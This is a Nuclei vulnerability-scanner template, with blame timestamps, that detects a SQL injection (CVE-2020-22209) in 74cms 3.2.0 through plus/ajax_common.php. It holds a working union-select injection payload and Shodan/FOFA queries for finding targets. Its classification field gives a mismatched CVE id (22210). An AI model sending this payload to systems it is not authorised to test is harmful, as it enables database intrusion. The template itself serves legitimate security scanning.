nuclei-templates/http/cves/2020/CVE-2020-22209.yaml

40 lines
987 B
YAML
Raw Normal View History

2022-06-05 10:40:34 +00:00
id: CVE-2020-22209
info:
2022-06-21 13:31:04 +00:00
name: 74cms - ajax_common.php SQL Injection
2022-06-05 10:40:34 +00:00
author: ritikchaddha
severity: critical
description: |
SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php.
reference:
- https://github.com/blindkey/cve_like/issues/12
2022-06-10 13:38:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-22209
2022-06-05 10:40:34 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-22210
cwe-id: CWE-89
cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:*
epss-score: 0.12933
2022-06-05 10:40:34 +00:00
metadata:
max-request: 1
2022-06-05 10:40:34 +00:00
fofa-query: app="74cms"
2022-06-28 09:24:03 +00:00
shodan-query: http.html:"74cms"
2022-06-05 10:40:34 +00:00
tags: cve,cve2020,74cms,sqli
2022-06-30 02:50:26 +00:00
variables:
num: "999999999"
http:
2022-06-05 10:40:34 +00:00
- method: GET
path:
2022-06-30 02:50:26 +00:00
- '{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5({{num}}),3%23%27'
2022-06-05 10:40:34 +00:00
matchers:
- type: word
part: body
words:
2022-06-30 02:50:26 +00:00
- '{{md5({{num}})}}'
2022-06-21 13:31:04 +00:00
# Enhanced by cs on 2022/06/21